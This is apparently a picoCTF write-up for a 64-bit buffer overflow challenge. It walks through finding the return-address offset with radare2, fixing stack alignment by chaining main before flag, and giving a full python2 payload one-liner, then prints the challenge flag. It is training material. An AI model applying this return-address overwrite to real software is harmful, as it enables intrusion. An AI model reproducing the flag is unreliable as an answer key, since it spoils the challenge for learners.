Problem

Lets try moving to 64-bit, but don't worry we'll start easy. Overflow the buffer and change the return address to the flag function in this program. You can find it in /problems/newoverflow-1_3_e53f871ba121b62d35646880e2577f89 on the shell server. Source.

• Program

• Source

Solution

1. Find the offset/padding

   1. You can use the method described in rop64 with the cyclic and cyclic_find or you can use the following

   2. Open vuln in radare2 with r2 ./vuln

   3. Run aaaa

   4. Run pdf @ sym.vuln to get var int local_40h @ rbp-0x40

   5. The 0x40 is the buffer location so 8 more bytes are needed to get past the "saved ebp register"

   6. So the offset is 0x40+8

2. Run readelf -s vuln to get the address of main and flag.

3. We can not offset and call the flag function directly because that would cause a stack misalignment in 64-bit. So instead we form out payload by doing padding + main_address + flag_address instead of just padding + flag_address as we would in 32-bit.

4. We can use p64 from pwntools to convert the hex addresses to little endian.

5. Payload complete: python2 -c "print 'A'*72 + '\xcb\x07@\x00\x00\x00\x00\x00' + 'g\x07@\x00\x00\x00\x00\x00'" | ./vuln

Flag

picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_bfd48203}